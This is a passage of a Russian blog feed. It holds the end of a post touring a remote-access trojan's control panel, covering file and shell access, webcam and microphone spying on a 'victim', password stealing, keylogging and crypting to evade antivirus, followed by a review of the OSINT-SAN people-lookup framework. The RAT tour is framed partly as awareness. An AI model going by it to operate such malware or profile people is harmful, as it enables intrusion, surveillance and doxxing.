  &lt;p id=&quot;haru&quot;&gt;Это наш зараженный комп. Таких может быть много.&lt;/p&gt;
  &lt;p id=&quot;lb33&quot;&gt;Теперь кликнув правой кнопкой мыши мы можем увидеть функции, доступные нам.&lt;/p&gt;
  &lt;figure id=&quot;84oS&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/83/9f/839f0b1f-a30b-4e8a-81b4-8bc6e88eec66.png&quot; width=&quot;1062&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;C2ZK&quot;&gt;Менеджер контроля:&lt;/p&gt;
  &lt;figure id=&quot;JUvJ&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b3/6f/b36ff382-df73-4bcc-b540-b5db18e47177.png&quot; width=&quot;828&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;8LZN&quot;&gt;Даёт нам возможность получить доступ к файловой системе, реестру, командной строке, процессам и службам, а также посмотреть текущие сетевые подключения. Здесь же мы можем скачать, загрузить и запустить любые файлы, например другие вирусы.&lt;/p&gt;
  &lt;p id=&quot;hXOf&quot;&gt;Вторая функция запуска файла повторяет тоже самое. Позволяет выбрать наш файл на компе, отправить его во временную папку и запустить.&lt;/p&gt;
  &lt;p id=&quot;tSIf&quot;&gt;Удаленный экран&lt;/p&gt;
  &lt;figure id=&quot;egUi&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/8c/ff/8cff157d-6526-49ac-aa88-806d5ced8ad7.png&quot; width=&quot;1092&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;gNNr&quot;&gt;Позволяет совместно проводить время с жертвой за просмотром культурных фильмов. А функция удаленной камеры и микрофона ещё и позволит проникнуться полностью его эмоциями и впечатлении о происходящей на мониторе картине. Помимо этого удаленный экран дает возможность перехватить управление мышкой и клавиатурой, делать скрины и запись экрана в некоторых ратниках.&lt;/p&gt;
  &lt;p id=&quot;zs5H&quot;&gt;Остальные функции думаю и так понятны, сами попробуйте и потыкайте. Воровалка паролей ворует пароли, кейлогер записывает то, что печатает на клавиатуре жертва.&lt;/p&gt;
  &lt;p id=&quot;K8Na&quot;&gt;Кнопка сервер позволяет удалить или обновить наш ратник, например, когда мы обновили его версию, по новой закриптовали (зашифровали для того чтобы антивирусы не видели вирус как вирус).&lt;/p&gt;
  &lt;h3 id=&quot;KfIu&quot;&gt;Каков итог?&lt;/h3&gt;
  &lt;p id=&quot;Qy30&quot;&gt;Если ваш пк ведёт себя странно - посмотрите на процессы и соединения в службах Windows.&lt;/p&gt;
  &lt;p id=&quot;A3lz&quot;&gt;Ратник позволяет легко управлять устройствами жертв, получая полный доступ и неограниченные возможности над ними - но раскрывает ip вашего сервера/vpn/proxy/etc...&lt;/p&gt;
  &lt;p id=&quot;0gM0&quot;&gt;Используйте эту информацию чтобы проверить, как оно работает, и знать, как от этого можно защититься и даже сдеанонить мамкина доксера.&lt;/p&gt;
  &lt;p id=&quot;hDSq&quot;&gt;На связи был Hunter Ghoul, подписывайтесь на мой &lt;a href=&quot;https://t.me/hunterghoul_team&quot; target=&quot;_blank&quot;&gt;канал&lt;/a&gt; и до новых встреч.&lt;/p&gt;

</content></entry><entry><id>hunterghoul_team:osint-san</id><link rel="alternate" type="text/html" href="https://teletype.in/@hunterghoul_team/osint-san?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hunterghoul_team"></link><title>OSINT-SAN Framework - или чё такое OSINT.</title><published>2024-10-27T12:10:48.721Z</published><updated>2024-10-27T12:13:26.890Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img2.teletype.in/files/9c/db/9cdb5420-877d-4ebc-b8a4-4dbeae0ec295.png"></media:thumbnail><category term="osint" label="OSINT"></category><summary type="html">&lt;img src=&quot;https://github.com/Bafomet666/OSINT-SAN/blob/main/report/Screenshot%20at%202024-04-03%2017-29-19.png?raw=true&quot;&gt;OSINT-SAN Framework - это семейство OSINT-ориентированных утилит, предназначенных для упорядоченного сбора и хранения данных с помощью автоматизированных скриптов - парсеров.</summary><content type="html">
  &lt;figure id=&quot;cAXt&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://github.com/Bafomet666/OSINT-SAN/blob/main/report/Screenshot%20at%202024-04-03%2017-29-19.png?raw=true&quot; width=&quot;1644&quot; /&gt;
    &lt;figcaption&gt;Картинка из Github разработчика&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;Введение&quot;&gt;Введение&lt;/h3&gt;
  &lt;p id=&quot;Mxwj&quot;&gt;OSINT-SAN Framework - это семейство OSINT-ориентированных утилит, предназначенных для упорядоченного сбора и хранения данных с помощью автоматизированных скриптов - парсеров.&lt;/p&gt;
  &lt;p id=&quot;rYjp&quot;&gt;Парсеры - это такие скрипты, которые на вход принимают некоторые данные, после чего обрабатывают их и сохраняют в удобном формате. Под обработкой понимается запрос на различные ресурсы и базы данных, где введенная информация сопоставляется с массивом других данных. Да, BIG DATA создаёт BIG BROTHER, так что парсеры заточены на то, чтобы вытащить релевантные данные по нашему запросу из массы источников.&lt;/p&gt;
  &lt;p id=&quot;wPCL&quot;&gt;Если источники открытые, то, это как правило в разведывательных сообществах принято называть OSINT (open-source intelligence, англ. разведка по открытым источникам).&lt;/p&gt;
  &lt;p id=&quot;NYR3&quot;&gt;Если же источники носят закрытый характер, например это какие-то федеральные базы, оперативное досье, сводки и так далее - это уже прямой путь в так называемый &amp;quot;пробив&amp;quot;. Т.е. к подкупу действующих сотрудников, имеющих посредственный или непосредственный доступ к базам данных, готовых за определенную сумму вытащить оттуда всю инфу по вашему целевому запросу.&lt;/p&gt;
  &lt;p id=&quot;CdZG&quot;&gt;Но сегодня речь пойдет о clearnet, об открытых (по крайней мере относительно) источниках, и в частности о программе OSINT-SAN, потому как на её примере я хочу показать, кто такие на моё субъективное мнение асынтеры, те, которые действительно могут ими считаться.&lt;/p&gt;
  &lt;h3 id=&quot;Глава-лирическая---OSINT-NASRAL.&quot;&gt;Глава лирическая - OSINT-NASRAL.&lt;/h3&gt;
  &lt;p id=&quot;f5KI&quot;&gt;И так как я уже ранее упомянул, OSINT-SAN - это фреймворк, т.е. семейство инфо продуктов. В отличии от например глаза бога, он состоит не только из одного телеграм бота. OSINT-SAN состоит из 3-х клиентов:&lt;/p&gt;
  &lt;ol id=&quot;dno3&quot;&gt;
    &lt;li id=&quot;HYDe&quot;&gt;Linux client - скачать можно &lt;a href=&quot;https://osintsan.agency/download_client&quot; target=&quot;_blank&quot;&gt;тут&lt;/a&gt;.&lt;/li&gt;
    &lt;li id=&quot;BJo2&quot;&gt;Web client - найти можно &lt;a href=&quot;https://osintsan.agency/&quot; target=&quot;_blank&quot;&gt;тут&lt;/a&gt;.&lt;/li&gt;
    &lt;li id=&quot;uzpN&quot;&gt;Telegram бот - он обитает &lt;a href=&quot;https://t.me/Sworp_san_bot&quot; target=&quot;_blank&quot;&gt;тут&lt;/a&gt;.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p id=&quot;ht1G&quot;&gt;В целом, почему назвал так данную главу - потому как на момент написания статьи работает это всё коряво, с багами и недоработками. Но, благо - работает!!! Да и цель не реклама продукта и даже не продвижение массы. Цель написание данной статьи иная, в конце поймете.&lt;/p&gt;
  &lt;h3 id=&quot;Linux-client---установка-и-использование.&quot;&gt;Linux client - установка и использование.&lt;/h3&gt;
  &lt;p id=&quot;CbvI&quot;&gt;Ну, погнали попробуем скачать и установить клиент на линукс.&lt;/p&gt;
  &lt;p id=&quot;SsMN&quot;&gt;Требования:&lt;/p&gt;
  &lt;ol id=&quot;dM8k&quot;&gt;
    &lt;li id=&quot;e7MT&quot;&gt;Я использовал kali linux, последняя версия для virtualbox. Про гипервизоры потом отдельно поговорим.&lt;/li&gt;
    &lt;li id=&quot;faY7&quot;&gt;Нужен установленный python 3 версии. С поддержкой pip. В kali linux по умолчанию установлен.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p id=&quot;cWxB&quot;&gt;Ну вот и все собственно требования. Память на жестком диске, память оперативная. В общем всё по стандарту чтобы всё запустилось и работало.&lt;/p&gt;
  &lt;p id=&quot;YcXa&quot;&gt;Теперь &lt;strong&gt;установка &lt;/strong&gt;по шагам:&lt;/p&gt;
  &lt;ul id=&quot;zokw&quot;&gt;
    &lt;li id=&quot;YjE8&quot;&gt;Мы с вами &lt;a href=&quot;https://osintsan.agency/download_client&quot; target=&quot;_blank&quot;&gt;скачали&lt;/a&gt; и распаковали архив последней версии клиента.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure id=&quot;pi94&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/af/95/af95a611-2d46-4f6a-9687-2e2ca24bd23f.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Распакованный клиент OSINT-SAN Framework.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;ul id=&quot;YXDP&quot;&gt;
    &lt;li id=&quot;N03n&quot;&gt;Далее открываем здесь командную строку, выполняем &lt;code&gt;sudo -i&lt;/code&gt; чтобы стать root-ом, и далее просто запускаем установку клиента командой &lt;code&gt;python3 install.py&lt;/code&gt;. Потребуется подключение к интернету и некоторое время чтобы установились все зависимости.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure id=&quot;cTsW&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/ea/73/ea73051a-c0f3-4703-90cb-2254ec896e51.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Запуск установки клиента.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;ul id=&quot;c0bB&quot;&gt;
    &lt;li id=&quot;2ZDU&quot;&gt;После успешного (но таки да, с ошибками...) завершения процесса установки нас будет ждать сообщение о том, как запускать данный клиент.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure id=&quot;bIEX&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d2/e5/d2e548a9-0243-461a-ab04-bf11206174eb.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Завершение установки.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;UhHf&quot;&gt;По итогу у нас при установке в папке клиента создалась папка для python-venv - OSINT-SAN_ENVIRONMENT. Давайте посмотрим в неё.&lt;/p&gt;
  &lt;figure id=&quot;FXVv&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/60/b5/60b57a42-820b-441b-9a7e-34d8ecf20b11.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Папка нашего клиента с OSINT-SAN_ENVIRONMENT&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;yGOS&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/26/95/2695b1c0-1092-4f88-8923-9be502e4dff9.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Содержимое папки OSINT-SAN_ENVIRONMENT&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;0B8C&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/12/60/12601f06-b9cf-452a-b67a-3d8afe05c4ec.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Содержимое файла activate&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ihWM&quot;&gt;Если вы шарите за python, то для вас данный фреймворк должен стать хорошим другом для изучения того, как можно всё автоматизировать и красиво сделать с помощью данного ЯП (языка программирования).&lt;/p&gt;
  &lt;p id=&quot;uHN9&quot;&gt;Теперь, пока вас не успел схватить инфаркт, поясняю - процесс запуска клиента мы с вами автоматизируем, чтобы не пришлось по сто раз вводить все эти команды.&lt;/p&gt;
  &lt;p id=&quot;LrEJ&quot;&gt;Создадим с вами файл на рабочем столе, назовем его например osanrun.sh (.sh - это формат исполняемых файлов linux, bash скриптов.&lt;/p&gt;
  &lt;p id=&quot;uIvh&quot;&gt;Теперь пропишем в нём следующее:&lt;/p&gt;
  &lt;figure id=&quot;81Pd&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f7/76/f7765d0b-d7f6-42d3-bfff-88eb1c8c6e07.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Содержимое файла osanrun.sh&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;hepB&quot;&gt;&lt;code&gt;#!/bin/bash&lt;br /&gt;cd /home/kali/Downloads/last_client/&lt;br /&gt;source OSINT-SAN_ENVIRONMENT/bin/activate&lt;br /&gt;python3 san.py&lt;br /&gt;&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;VlfZ&quot;&gt;Что здесь написано?&lt;/p&gt;
  &lt;p id=&quot;ARvs&quot;&gt;&lt;code&gt;#!/bin/bash&lt;/code&gt; - здесь мы вызываем работу в bash.&lt;/p&gt;
  &lt;p id=&quot;I9Zh&quot;&gt;&lt;code&gt;cd /ваш_путь_до_клиента/&lt;/code&gt; - здесь мы с вами переходим в папку с нашим клиентом (именно путь до клиента, не до &lt;code&gt;OSINT-SAN_ENVIRONMENT&lt;/code&gt; ).&lt;/p&gt;
  &lt;p id=&quot;UEPZ&quot;&gt;&lt;code&gt;source OSINT-SAN_ENVIRONMENT/bin/activate&lt;/code&gt; - здесь мы задаем путь к нашей созданной python-venv библиотеке или как там правильно, не шарю.&lt;/p&gt;
  &lt;p id=&quot;yEAC&quot;&gt;&lt;code&gt;python3 san.py&lt;/code&gt; - здесь мы запускаем наш клиент.&lt;/p&gt;
  &lt;p id=&quot;TDgu&quot;&gt;Сохраняем наш файл, открываем терминал на рабочем столе и пишем: &lt;code&gt;chmod +x &amp;lt;название нашего файла&amp;gt;&lt;/code&gt; и запускаем командой &lt;code&gt;sudo ./osanrun.sh&lt;/code&gt; (заменить на имя вашего файла).&lt;/p&gt;
  &lt;figure id=&quot;40f5&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/37/3d/373d90b3-53bc-45c2-a558-a64a140ec1fa.png&quot; width=&quot;789&quot; /&gt;
    &lt;figcaption&gt;Команды для запуска нашего скрипта&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;TAen&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/3a/25/3a258f67-ae3c-4098-9fe0-15d92cfc51ce.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Окно OSINT-SAN&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;SUh2&quot;&gt;И да, ура, у нас запустился клиент. Теперь, нужно до установить зависимости - пишем слово &lt;code&gt;driver&lt;/code&gt; и жмем &lt;code&gt;Enter&lt;/code&gt;&lt;/p&gt;
  &lt;figure id=&quot;RQSY&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/db/83/db83553d-3462-425a-9aef-2ff1d001f217.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Начало установки driver&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;U8UZ&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/58/69/5869f852-3439-4345-ba9c-f017259ade77.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Конец установки driver&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;UC1K&quot;&gt;На всё соглашаемся и после чего видим окончание установки. Для того чтобы очистить экран от всего лишнего вводим команду &lt;code&gt;clear&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;GLLe&quot;&gt;Теперь авторизовываемся в клиенте, введя цифру 1.&lt;/p&gt;
  &lt;figure id=&quot;ljUO&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/71/17/71179648-f413-4f16-814c-27f388728976.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Авторизация&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;lqoK&quot;&gt;Здесь нас просят ввести логин и пароль от учетки. Учетка платная, благо у меня есть и я вам покажу платный клиент. Вы можете &lt;a href=&quot;https://github.com/Bafomet666/OSINT-SAN&quot; target=&quot;_blank&quot;&gt;скачать&lt;/a&gt; с гитхаба бесплатную версию и пощупать её.&lt;/p&gt;
  &lt;figure id=&quot;YZtv&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/5a/86/5a861ed5-ba19-49d9-96ac-9588e082f313.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Главное меню клиента&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;k4lM&quot;&gt;После авторизации нас встречает главное меню клиента.&lt;/p&gt;
  &lt;p id=&quot;GuqS&quot;&gt;Красными словами написаны команды, введя которые мы перейдем в соответствующий модуль со ссылками на источники, где можно поосинтить интересующую нас фигню, а также воспользоваться встроенными инструментами и самописными парсерами.&lt;/p&gt;
  &lt;p id=&quot;J4oz&quot;&gt;Попробуем на примере телефона, введя &lt;code&gt;phone&lt;/code&gt;.&lt;/p&gt;
  &lt;figure id=&quot;cTJK&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/26/46/2646ab20-034c-4f94-a4b8-8e728e0a3da0.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Выдача по номеру&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;Emnz&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/7d/7b/7d7be729-a5a7-4b3c-83f7-1a99f4fecdab.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Выдача по номеру (продолжение)&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Utzd&quot;&gt;Но это всё полная хрень по сравнению с главной (как по мне) функцией - возможностью создать отчёт.&lt;/p&gt;
  &lt;p id=&quot;5CnS&quot;&gt;Для этого мы вводим команду &lt;code&gt;pdf&lt;/code&gt; или &lt;code&gt;project&lt;/code&gt;&lt;/p&gt;
  &lt;figure id=&quot;6WFm&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/38/c8/38c8fc62-904e-4aec-b896-d44f636a9c3b.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;report manager&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;t5C3&quot;&gt;У нас открывается пофикшенный в 13 версии report manager. Здесь чуть-чуть остановимся на функциях:&lt;/p&gt;
  &lt;ol id=&quot;QLSB&quot;&gt;
    &lt;li id=&quot;mbmy&quot;&gt;Создаёт проект, после этого мы с можем в него зайти и работать.&lt;/li&gt;
    &lt;li id=&quot;1TTb&quot;&gt;Показывает списки проектов.&lt;/li&gt;
    &lt;li id=&quot;RpWV&quot;&gt;Запускает нас в выбранный нами проект.&lt;/li&gt;
    &lt;li id=&quot;Slyi&quot;&gt;Удаляет выбранный проект.&lt;/li&gt;
    &lt;li id=&quot;ONtd&quot;&gt;Генерирует отчёт.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p id=&quot;ydhj&quot;&gt;Ну 99 это стандартная кнопка выхода в главное меню.&lt;/p&gt;
  &lt;p id=&quot;CJVW&quot;&gt;Не буду останавливаться на всех тулзах и фичах, кроме как выбора нашего проекта и генерации отчета. И так, мы уже создали проект с помощью цифры 1. Теперь выберем его с помощью цифры 3.&lt;/p&gt;
  &lt;figure id=&quot;SjAk&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/c2/ea/c2ea2393-afc9-4663-b8af-c769864831fb.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Выбор проекта&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;dKgz&quot;&gt;Возвращаемся в главное меню и видим следующее:&lt;/p&gt;
  &lt;figure id=&quot;97Jh&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/52/98/52985457-5760-452e-8521-024f5114d4e0.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Главное меню и отображение нашего проекта (выделено)&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Vm8u&quot;&gt;Теперь у нас отображается test1 там где мы вводим команды.&lt;/p&gt;
  &lt;p id=&quot;Qkzr&quot;&gt;Окей, теперь всё что нам остается, это поискать здесь инфу по нашей цели и сгенерировать отчёт.&lt;/p&gt;
  &lt;figure id=&quot;B91m&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/ad/67/ad670351-c881-4c36-8dc7-aa83be79a0b8.png&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;4DRv&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/86/e0/86e057db-8a35-401a-b98e-8cad589c597b.png&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;SGzx&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d1/cd/d1cd7db9-47ce-4c12-9255-f7a7abb7b2da.png&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;1mKH&quot;&gt;Тут у меня выдало ошибку и здесь мы возвращаемся о корявости проекта.&lt;/p&gt;
  &lt;figure id=&quot;TkKF&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/cd/bb/cdbbc548-8d40-4688-8210-6e597170e9f6.png&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;vTSC&quot;&gt;Здесь мы заходим в модуль &lt;code&gt;region&lt;/code&gt; который позволяет по нашему запросу доркнуть события в интернете. Доркинг - это использование слов-фильтров в поисковых системах, таких как Google, Yandex и другие.&lt;/p&gt;
  &lt;p id=&quot;y80P&quot;&gt;Ну короче - чтобы нам добавить русский язык в кали, заходим в менеджер настроек, ищем там настройку &lt;code&gt;Keyboard&lt;/code&gt;, заходим в &lt;code&gt;Layout&lt;/code&gt;, выключаем вверху флажок дефолтных настроек, и с помощью разблокированной кнопки &lt;code&gt;Add&lt;/code&gt; добавляем русский язык. В графе &lt;code&gt;Change layout option&lt;/code&gt; выбираем как переключать язык, например стандартно Alt + Shift.&lt;/p&gt;
  &lt;p id=&quot;HWAT&quot;&gt;Ну вот и всё. Собираем запросики событий в инете и идём генерить отчет.&lt;/p&gt;
  &lt;figure id=&quot;xMIY&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/63/6e/636e7f3f-c23e-4480-9d4c-755e5acbf1f3.png&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;WfGM&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/51/2b/512bde01-3cc2-4083-8e7a-5727c4a4fc6a.png&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;0XM6&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/de/cd/decd8387-af37-48fe-8488-4ba8dd138ad3.png&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;uQ1M&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/39/f5/39f5d9c4-631a-499b-9f19-bd49fcd3776b.png&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;BjuN&quot;&gt;Здесь ещё подсобрали инфу по почте.&lt;/p&gt;
  &lt;p id=&quot;3Ufy&quot;&gt;&lt;/p&gt;
  &lt;p id=&quot;ftvj&quot;&gt;Ну и напоследок скажу об одной важной команде - &lt;code&gt;help&lt;/code&gt;.&lt;/p&gt;
  &lt;figure id=&quot;yM6j&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b5/5e/b55e85b5-d829-4907-86a9-720bc2a0f17b.png&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ATvr&quot;&gt;Здесь у нас отображаются красным все слова-модули, и ещё отдельным цветом в список так называемые теги. Теги - это слова, которые выдают нам источники где нарыть интересующую инфу. Проще говоря вбиваем тег, жмем Enter, и нам выдаст ресурсы на источники где можно пошерстить инфу по этому тегу. Например вводим email - получаем список сайтов где можно по email найти другие данные. Что-то вроде HowToFind и прочих агрегаторов инфы по OSINT источникам.&lt;/p&gt;
  &lt;p id=&quot;9Hfm&quot;&gt;После окончания работы над проектом, обратно заходим в менеджер проектов.&lt;/p&gt;
  &lt;figure id=&quot;qZnl&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/89/e6/89e66240-858a-4b12-a1bb-f8f0b8f3fddb.png&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;urrx&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/9c/fd/9cfd96ba-583b-4cf2-b95d-0a4b3bb18934.png&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;TCFA&quot;&gt;С помощью цифры пять выбираем наш проект и генерим отчет, о чем успешно нам сообщает OSINT-SAN, написав, что наш отчёт сохранен в папке &lt;code&gt;report/&lt;/code&gt;&lt;/p&gt;
  &lt;figure id=&quot;lkRQ&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/a8/be/a8be641b-23cc-4603-811f-df227bb8eb02.png&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;EJii&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/a1/fd/a1fd9357-11e1-44d3-95ae-6c517c08a74c.png&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;ajnG&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/01/08/0108fc3f-3a3e-4347-a346-4b057b238c40.png&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;l1Fu&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d3/4c/d34ca662-e7e6-4946-9af8-bb4a5feec291.png&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;d9uU&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/9e/fb/9efb4ff9-8bdf-4d55-be4c-dcd325427436.png&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;dKh7&quot;&gt;Отчёт прикреплю к посту в комменты, так что сами сможете с ним более подробно ознакомиться. В ознакомительных целях конечно же.&lt;/p&gt;
  &lt;p id=&quot;Szh7&quot;&gt;И пару слов о других прогах.&lt;/p&gt;
  &lt;p id=&quot;iHyc&quot;&gt;Значит Web-клиент выглядит так:&lt;/p&gt;
  &lt;figure id=&quot;4ebz&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d2/c3/d2c35520-8297-4a10-bb13-30f9a9b88704.png&quot; width=&quot;1853&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;7BKn&quot;&gt;Здесь прикольная фишка с камерами на карте, но на момент написания поста она сдохла, увы.&lt;/p&gt;
  &lt;figure id=&quot;IgAe&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/84/80/84800cf4-bc46-4a9a-aaf7-3c72373d4fa7.png&quot; width=&quot;806&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;eoQa&quot;&gt;Бот телеграм. Ну здесь всё по стандарту, ничего нового.&lt;/p&gt;
  &lt;h3 id=&quot;KVdu&quot;&gt;Итоги и ответ на вопрос: &amp;quot;ну так и че такое OSINT??&amp;quot;&lt;/h3&gt;
  &lt;p id=&quot;Jj41&quot;&gt;Покончив с обзором OSINT-SAN, хочу сказать следующее - продукт сырой, ждать доработки ещё придется N количество времени. Благо Максим Викторович нашёл программиста, так что надеюсь дело сдвинется с мертвой точки. Пока своих денег продукт не стоит, по функционалу и количеству багов. Моё субъективное мнение.&lt;/p&gt;
  &lt;p id=&quot;KDeJ&quot;&gt;Для чего данный пост был написан? А для того, чтобы заострить ваше внимание на одной простой истине. Если ваш OSINT сводится к тупому тыканью в глазе бога и радостным крикам: &amp;quot;хы-хы-хы задоксил&amp;quot; - то хуевый с вас OSINT специалист. Лично я не могу относиться серьезно к тем, кто не умея банально автоматизировать сбор информации из баз данных и открытых источников обучает чему-то людей за большие деньги, берет в работу расследования инцидентов у коммерции или боже упаси, у физических лиц. Ну нет у вас квалификации должного уровня, хоть убей. Глаз бога умрет и вместе с ним умрут тысячи &amp;quot;крутых&amp;quot; осинтеров СНГ. Только через личный труд, постижение программирования, логики, автоматизации и агрегации инструментария растёт уровень компетенций OSINT специалиста. И именно как не асынтера, доксера, сватера и прочей чепухи, а как серьезного, с высокоразвитым критическим мышлением аналитика - военного, коммерческого, да и любого другого 